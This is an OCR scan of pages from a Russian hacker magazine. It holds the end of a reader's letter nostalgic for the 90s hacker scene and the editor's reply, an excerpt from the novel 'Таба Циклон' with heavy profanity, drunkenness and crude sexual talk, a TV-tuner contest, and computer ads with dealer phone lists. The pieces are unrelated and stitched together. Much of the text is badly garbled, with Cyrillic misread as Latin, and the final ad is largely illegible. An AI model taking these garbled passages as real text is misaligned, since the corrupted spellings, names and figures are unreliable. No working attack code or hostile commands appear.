ров, собирающихся в «хак»(лам)-группы, без «хакеров» которые 
только и умеют, что нажать на кнопку в очередном брутфорсе) это 
фидо, но и оно уже отживает свой век... Где! Где спрашиваю я вас 
все те люди, которые еще 5 — 7 лет назад могли своротить горы, где 
то время, когда человек по 50 — 100 объединялись, лишь для того, 
чтобы завалить один, ненавистный сервак массовой ЭоЗ-атакой, 
где те войны, которые проводились между разными хак-группами, 
за право лидерства, где все те звезды андерграунда, от которых сей- 
час остались только крупицы, где..? В общем, можете конечно и не 
печатать данное письмо, но прочитайте его и задумайтесь. . . 

Ладно, об этом можно писать вечно, бывайте и удачи всем. 

З.Ы. Есть предложение, соберите старые архивы Хакера в РЭЕ и 
скиньте на ЭѴЭ в следующем номере, я думаю, что абсолютно все 
ваши читатели оценят это! 

Да к чему тут ностальгия? Вот что я тебе посоветую. Если ты ре- 
ально хоче шь проникнуться атмосферой 90-х, тебе нужно скачать 
Ог.ѴѴеЪ года эдак 97-го. Кнему в комплекте шел ѵігіізГ.сКѵЬ. Я тебе 
скажу: это не рафинированные вирусные энциклопедии XXI века! 
Это хардкорный текстовик, в котором Игорь Данилов без стес- 
нения печатал все то, что вирусы тех времен выводили на экран. А 
на экран они выводили, как ты понимаешь, тот самый хакерский 
фан 90-х :). Почитаешь его — и созреешь для большего. Почитай 
езины того времени, почитай ІпГесГесі Ѵоісе, почитай Верстак, 
почитай. . .эх, не помню уже, что тогда было. В общем, этого для 
начала хватит. Да и вообще, впитывай атмосферу нашего времени. 
Может быть, когда-нибудь и ты тряхнешь седой бородой и рас- 
скажешь внучкам, как оно было в начале XXI века вольготно, ведь 
тогда даже не вшивали чипов послушания (который бьет током 
за любую околопротивозаконную мысль) под кожу, а в системах 
того времени даже не было встроенной проверки пользователя 
на алкоголь! Можно было сесть ПЬЯНЫМ ЗА КОМПЬЮТЕР! 
Для входа в Интернет не нужно было сдавать экзамен, получать 
права. Не было виртуальной реальности, не было нанороботов и 
нанофабрик, поэтому дикари того времени покупали ботинки по 
Интернету и кучу времени ждали доставки на дом! Такие вот дела, 
ребятушки. Кстати, про то, много ли чистого фана в современ- 
ном компьютерном андеграунде, я бы тебе посоветовал почитать в 
ХакерСпеце «Тотальный Взлом». 
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ТАБА ЦИКЛОН 

АРР0АСНІЫ6 І_ЕѴЕІ_4/// Е@#ТЬСЯ ХОЧЕТСЯ, НО Я НЕ СДАЮСЬ 
Автор иллюстрации: Иван Величко 



Мы продолжаем публиковать отрывки 
из лесбийского стриптиз-романа Дани 
Шеповалова «Таба Циклон». 

Подробности наѵѵѵѵѵѵ.сіапѵа.ги. 

— Даня, ты в пепельницу соусльешь, -ехидно 
замечает Никитин. 

Даня действительно наливает соевый соус 
для суши в круглую металлическую пепельни- 
цу с тремя желобками для сигарет. 

— Пошел в жопу! - огрызается Даня, макая 
суши с лососем в пепельницу и наливая себе 
еще водки. 

— Настоящие мужчины говорят «пошел нах#й!». 
-Пошел нах#й! 

Никитин смеется и льет в свой бокал шам- 
панское, тот переполняется, игристое вино 
озером растекается по поверхности стола. 
Никитин забрасывает озеро салфетками, те 
медленно намокают. . . 

— А тебе самому нравится Рита?- спрашива- 
ет он писателя. 

Даня смотрит на Веру, танцующую вместе с 
Ритой . Девчонка не отрывает взгляда от своей 
новой знакомой. Уже влюбилась в нее поуши, 
ему ли не знать... 

— Так нравится или нет? - повторяет вопрос 
Никитин. 

— Нет, - сухо отвечает писатель. 

— Даня! - смеется Никитин. - Если ты когда- 
нибудь будешь трахать таких женщин, мо- 
жешь считать, что жизнь твоя удалась! 

Даня ничего не отвечает. Что-то мешает 
ему сидеть - он достает из заднего кармана 
джинсов длинную зубочистку, к одному из кон- 
цов которой приклеен пышный зонтик сереб- 
ристой мишуры. Откуда онау него? Наверное, 
кто-то вытащил из коктейля и ради смеха засу- 
нул ему в карман, пока он пробирался сквозь 
толпу. Совсем уже все обнаглели. Похоже, 
даже последние безымянные статисты уже 
делают в его истории все, что хотят. 

Рядом за стойкой сидит и курит Ангел. Над 
его головой болтается картонный золотой 
нимб на проволочке. Судя по всему, Ангелу 
не хватает на выпивку. Он уже высыпал на 
стойку всю имевшуюся в карманах мелочь, а 
за нехватавшую сотню пытается теперь всу- 
чить бармену женские трусики и свой картон- 
ный нимб. 

«А что, очень романтично, - думает Даня. 

— Он променял небеса на земную любовь, а 
она разбила ему сердце. И вот теперь он ал- 
коголик, его все любят, жалеют, а он пишет 
стихи». 

— Знаешь, что я сейчас подумал?! -не унима- 
ется Никитин. - Музыка для женщин - это как 
шест для стриптиза, - что-то такое, за что они 
могутхотя бы на время зацепиться... Слушай, 

— его вдруг осеняет внезапная догадка, - а ты 
можешь написать так, чтобы у меня с Ритой 
что-нибудь вышло? 

— Нет. 

— Да ладно, что тебе стоит? 

— Нет. 

Движения Риты плавные, женственные. 
Они обещают что-то, что никогда не сбудет- 
ся, влекут к себе обманчивой мягкостью и 
податливостью. У Веры - резкие, угловатые, 
пытающиеся утвердить, зафиксировать себя 
во враждебной, как ей кажется, атмосфере. 
Рита смеется, берет Веру за руки и поднимает 
их вверх, затем притягивает девчонку к себе, 
кладетее ладони себе набедра. У одной длин- 
ные черные волосы, у другой - короткие свет- 
лые, почти мальчишеская стрижка. 

— Даня! - кричит Никитин. - Даня! 

— Чего тебе еще? 



— Это не мне! Это тебе! Я и про тебя только 
что все понял! У меня прямо какой-то вечер 
озарений. 

— Что ты понял? 

— Я понял, почему ты пишешь, как идиот! 

— Да? Очень интересно... И почему же? 

— Просто ты воспринимаешь мир как картин- 
ку, которая все время льется в твой мозг. И 
она производит на тебя такое сильное впе- 
чатление, что ты не знаешь, что с ней делать, 
не успеваешь даже ее осмыслить. Вот что: 
ты идеальный субъект. Ты не понимаешь, как 
устроены даже самые простые вещи, откуда 
они взялись и что означают. Это глупость, на 
самом деле. Ты попросту неумный, ненаблю- 
дательный и поверхностный. 

— Пошел ты! 

— Нет, правда, без обид. Ведь так и есть. Ты 
тонешь в информации, ты видишь слишком 
много, а поэтому не видишь ничего. Ну хо- 
чешь, проведем эксперимент, я тебе докажу. 

— Давай, - соглашается Даня. 

— Хорошо! Тогда... Ну, тогда посмотри сей- 
час направо и расскажи мне, что ты видишь. 

— Направо. . . Две девушки и парень. Выпива- 
ют в пятницу вечером. Может быть, работают 
вместе. А может, просто друзья. Болышесись- 
ка в черном - клевая. 

— Клевая? 

— Ну, в смысле, я бы ее трахнул. 

— Все? 

— Все. 

— Понятно... Не возражаешь, если я теперь 
расскажу, что я вижу? 

— Нет, конечно. 

— Ну, во-первых, никакие они не друзья, а 
только что познакомились - я видел, как он к 
ним подсел. Парень клеит как раз твою Боль- 
шесиську, но у него ничего не получится, по- 
тому что она думает, что слишком модная для 
него. Хотя, если бы она была одна, то, может 
быть, и повелась бы. А парню сразу нужно 
было снимать ее дохлую подругу. Дохлой тра- 
хаться хочется так, что аж в глазах темнеет. 
Но сейчас уже поздно, потому что, если он 
переключится на Дохлую, та его сразу ото- 
шьет - не захочет быть запасным вариантом. 
А у Большесиськи пластический хирург так 
себе, носик у нее симпатичный, конечно, но 
у нее же славянское лицо, нужно было де- 
лать чуть бол... 

— Ты чего, - почти что с благоговением пре- 
рывает его Даня, - действительно все это 
видишь? 

— Конечно! Все нормальные люди это видят. 
Аты, вотя на сто процентов уверен, думаешь, 
что сапоги на платформе и бюстгальтер у 
Большесиськи - это не одежда, а части ее 
тела. Ну правда, ведешь себя, как Дюймовоч- 
ка на негритянском балу. А все потому, что мир 
для тебя - это один большой поток. Он льется 
сквозь твои глаза, сквозь кожу, сквозь все 
твои чувства и не оставляет ничего от тебя са- 
мого. Причем следующая волна этого потока 
не оставляет практически ничего от предыду- 
щей. Понимаешь, о чем я? Ты ведь творчест- 
вом занимаешься, должен проникать в самую 
суть вещей. Творчество -оно... 

— В жопу творчество! - говорит писатель, 
поднимаясь из-за стойки. 

— Вот это ты верно сказал, - одобрительно 
кивает Никитин. - Это хорошо. Пусть это те- 
перь будет твоим девизом! 



ДАНЯ ШЕПОВАЛОВ 

/ КЕѴ@ОАМѴА.КІІ / 



— Пошел ты! 

— А сам-то куда собрался? Обиделся, что ли? 

— Нет. Пойду отолью. 

В туалете Даня не закрывает за собой 
дверь. Стоит, облокотившись для надежности 
лбом о выступающее науровне лица зеркало. 
Пьяный писатель покачивается из стороны в 
сторону, безуспешно пытаясь попасть в цель. 
Черт, ну зачем нужно было так напиваться? 
Наконец льдинки в писсуаре начинают таять, 
оседают, проваливаются. Он возвращается к 
барной стойке, застегивая на ходу ширинку. 

— Ну как? -спрашивает Никитин. -Успешно? 

— Так себе, - отвечает писатель, падая на 
стул . - Я там все обоссал . 

— Как это? -удивляется Никитин. 

— Так это. Вообще все. 

— Аххахха! Ну что же, Даня, ты не так уж без- 
надежен, как кажется на первый взгляд... 
Т огда. . . Ахахха. . . Т огда давай выпьем за твой 
след в истории! 

Они чокаются и выпивают. Писатель с 
трудом сдерживает рвотный позыв, когда пу- 
зырьки нагревшегося шампанского бурлят в 
горле. Запускает пальцы в волосы - горячий 
лоб, спутанные мокрые пряди. 

— Даня, ты, конечно, м#дак. Почку и кота я 
тебе никогда не прощу, - откровенничает Ни- 
китин, вдруг уже изрядно набравшийся - Но 
я все-таки тебе сейчас честно скажу кое-что. 
Не такой уж ты и дерьмовый писатель. Серь- 
езно! Во всяком случае, хоть припевы своих 
любимых песен не печатаешь. В наше время 
это редкость... 

— Спасибо. 

— Данезачто! И вотеще что хорошо: всесло- 
ваутебя простые, знакомые. Ато, знаешь, чи- 
таешь иногда, атам всякие «мизантроп», «па- 
пье-маше»... Черт его знает, что это такое. Ау 
тебя все в этом плане отлично. Это редкость, 
серьезно... Нет, есть, конечно, минусы. Ты 
только не обижайся: я же редактор, я все за- 
мечаю. Я тебе правду скажу. . . Суицидальный 
комплекс твой немножко утомляет. Нет, я по- 
нимаю, конечно, в самолюбовании есть свой 
шарм, этакая фишка. Вот посмотрите: Даня 
Шеповалов, взрослый мужчина, который ду- 
мает как подросток. И еще. . . Этот твой культ 
лузерства: вот, мол, какой я неудачник, мне 
нечего жрать, я не могу с телкой познакомить- 
ся, ну и так далее. Чтобы ты там ни думал, а 
это очень скверно выглядит, это - моветон. 
Знаешь, как Лев Пирогов такой стиль назы- 
вает: «Е@#ться хочется, но я не сдаюсь». Я, 
Дань, тебе сейчас действительно дельный со- 
вет дам. Резать надо твои тексты! - Никитин с 
чувством ударяет кулаком по столу. - Резать к 
чертовой матери!!! 

— До#$здишься сейчас, - огрызается Даня, 
демонстративно выкладывая на стойку бара 
исчерканную вдоль и поперек распечатку, 
щелкает авторучкой. - Неумный, ненаблю- 
дательный, резать... Одной почки ему, блин, 
много... 

— Ну можно, в принципе, и не резать, - спох- 
ватывается Никитин, до которого вдруг тоже 
доходит двусмысленность его собственных 
слов. - А вообще, ничего - бодренько так... 
Эй! Даня. . . Перестань! - Никитин хватает пи- 
сателя за рукав. - В шутки не врубаешься? 
Даня! Дань! Послушай меня! То, что ты дела- 
ешь, -это очень круто! Очень! Ты же им всем 
покажешь, как надо! Всем, этим занудам! 
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Ответь правильно на три несложных вопроса и расскажи нам, что ты будешь 
делать со своим новым ТѴ-тюнером, если выиграешь его. Может, ты будешь 
записывать сериалы для сестры? Или организуешь вещание спортивного 
канала в своей локалке? Авторы трех самых необычных идей, правильно от- 
ветивших на вопросы, получат призы от компании ВеИоІбег: тюнеры ВеНоІсІ 
ТѴ 507 РЮЗ, ВеНоІсІ ТѴ 505 РЮ8 и ВеИоІсІ ТѴ СоІитЬиз. Ждем твоего письма 
по адресу: Шпег@геаІ.хакер.ги . А вот вопросы, на которые нужно дать ответ, 
чтобы победить: 



БеЬо1^ еГ 



реіпоібег.ги 



Надоело бегать от компа к телевизору? Сестра смотрит испанские сериалы 
во время трансляций футбольных матчей твоей любимой команды? Не беда, 
приятель. Мы поможем тебе! 
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ГІ.АТКОЫ Р700Р 



Абсолютно плоский экран 
Размер точки 0,24 мм 
Частота развертки 95 кГ ц 
Экранное разрешение 1600x1200 
ІІ5В-интерфейс 



1/ша Ѵісіопа 

(095) 688 611 7. 688-17-65 
Ѵѵ'\Ѵ\ѴГ>ѴС'ОМРКІІ 



Москва: АБ-групп (095) 745-51 75; Акситек (095) 784-7224; Банкос (095) 1 28-9022; ДЕЛ (095) 250-5536; Дилайн (095) 969-2222; Инкотрейд (095) 1 76-2873; ИНЭЛ (095) 742-6436; Карин (095) 956-1 1 58 
Компьютерный салон ЗМЗ (095) 956-1225; Компания КИТ (095) 777-6655; Никс (095) 974-3333; 0ЛДИ (095) 105-0700; Регард (095) 912-4224; Сетевая Лаборатория (095) 784-6490 
СКИД (095) 232-3324; Тринити Электронике (095) 737-8046; Формоза (095) 234-2164; Ф-Центр (095) 472-6104; ЭЛСТ (095) 728-4060; РІаке (095) 236-992; Рогсе Сотриіегз (095) 775-6655 
І5М (095) 718-4020; Меціп (095) 727-1222; N7 Сотриіег (095) 970-1930; Р-31уІе Тгабіпд (095) 514-1414; ЛЗІМ Сотриіегз (095) 755-8202; II США Сотриіегз (095) 729-5255; ЭЛЕКТОН (095) 956-3819 
ПортКом (095)777-0210; Архангельск: Северная Корона (8182) 653-525; Волгоград: Техком (8612) 699-850; Воронеж: Рет (0732) 779-339; РИАН (0732) 512-412; Сани (0732) 54-00-00 
Иркутск: Билайн (3952) 240-024; Комтек (3952) 258-338; Краснодар: Игрек (8612) 699-850; Лабытнанги: КЦ ЯМАЛ (34992) 51777; Липецк: Регард-тур (0742) 485-285 
Новосибирск: Квеста (38322) 332-407; Нижний Новгород: Бюро-К (8312) 422-367; Пермь: Гаском (8612) 699-850; Ростов-на-Дону: Зенит-Компьютер (8632) 950-300 
Тюмень: ИНЭКС-Техника (3452) 390-036. 
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Компьютер К ГГ САМЕП СП 



шжшь к і^І с о пл . ги 

Сам л я мощная пгрйваз «станция для настоящих геймеров 



пцоилссоя ІМТЕІ. ѵ РенСіит - О ЙМ | З-.И ГГні 

□гм>ро Гии М.іл пхмістЬі 2 ГБ Цц|у1йДзшпк+ЦА| 

Цктійдщж ІБіТГП- 

Оп ГмчОСігіні ІірниСД Пишу _,н.н СЗ^ПіС Р-Вл^лМ 

ш ЧН С#РвК* І=Х е^ЖѴТ. ТѴ-огі, БііАІ РѴК 
Зв*- ЭОЭФмИ-а? 1 

М4н« Г*# ІИ" ЦСЕУПТ пд^ипь 

Кйгкетен 2 квлс-ччн * г^иуф-г м іясрѵ по| 

Кл иіМРНТ уря иТЛ 1 зТКЧПД 1 *НЧИ|и 

МкіІШЬ «ГГНЧИИИС; ІИП«№М ПРОКРѴТИИ 

Рарчдустинмгиним ПО Мі ■:«■■:■ ь о №••■ Хйпейии- 4РЕ - Могло ЕлЛКкнГ 

ПС- ѵ килплнтс ам^иомр-^ти-. обучі-оішіо праграьиьл, 

я,рл иікр^ы, пагншыа утилиты, 
офпсн-ьм прагрзыииі 

■Нфи.-цма ЦИТ р#Щ-|**на*рт нгпдр*и№*гн. МИЛННН^Ч іттртиНО**^Ч- 
№с л>н№ Отігнімп-С' ДР 



КФрпОрОіиіініиѲ и ОПТОВДЛ» Н|Х)ШДжи (495) 7И-ВД-45 

Розничная прадачи- |495) 777 а, Б&-Ю 

ИнтернЕт-мвгаа-ин ШѴ.КіТСЙМ ЙУ 

СЕЛЪ КОиПьЮТІІЖЫХ СКЛОНИ КИТ 

"НоюсаоЪвдг^" Нс-мсгю?кші:> « .1 14-/14 стр. 4 і ТВТ« ЕЭ--7Э 

ЛцЪлцщі- гя* 'Миен', тщц Г- і-гуі* и П5#-*0-М: ЛЬЯ-Ю-ЗА 

~Т > ТЦ|ІІ.[-.ВВГ. РО Я СТС4Г04ІЕ». я 4 і. 49 ■ 41 1 -ЛЬ: *Я I ■ ІЛ- Ір 

Ъ ЭМіштш". Ш5 *Ті у.Г)И і ~лг і у* 1 ’'' ІЧІЬ 4,1 г ТВВ !Ь Ц. Т&В.14 14 

г і, о |ічі і " і ■ і ТК.-СИДІИ" пр і(йСѵСнаіРПЬ і ІЬ і й4Э-ЗЭ-Н 



Нопеншнй двухъ ядерныи процессор ІпТеІ-Й РепТІ-итФ О 

■ Последняя, модель видеокарты, позвогіиющзи пр 
достоинству оценить графику игры 

- Встроенным ОѴй-ПѴѴ. дпя создания коллекции любимых 
игр, фильмов и музыки 

- Возможность работы о ЗВ-графн но н , видео и звуком на 
профессиональном уровне 

• Стильный дизайн 

- Большой ЖК-мониторе быстрой матрицей 




Все возможности 

для отдыха и развлечений! 

Используя новейший двухъвдерныи 
процессор 1п№№ РвгИіигп® О. компьютер 
КПГ ЗАМЕН СЧ предоставляет Вам 
больше вычислительных ресурсов, 
позволяя по-настоящему насладиться 
вседи достижениями новейших мульти- 
медиа-программ. 




Репііит О 

ітШе 



• С-НѴГГО г-^птч-іл^* Г^Срі Ь 

(МЬ> нф-Гш 



СО ѴТ тфікф Шт ѴфЩг 1 



14» тл |#«*»гаф Ѵв& ѵм в Ш#| Гг, .. Гшшя* ты 'Л^ЦДр - Рр»л р 

.иі *«г,-і і — !'44і* -ВС*Г - " ГЧ*- 





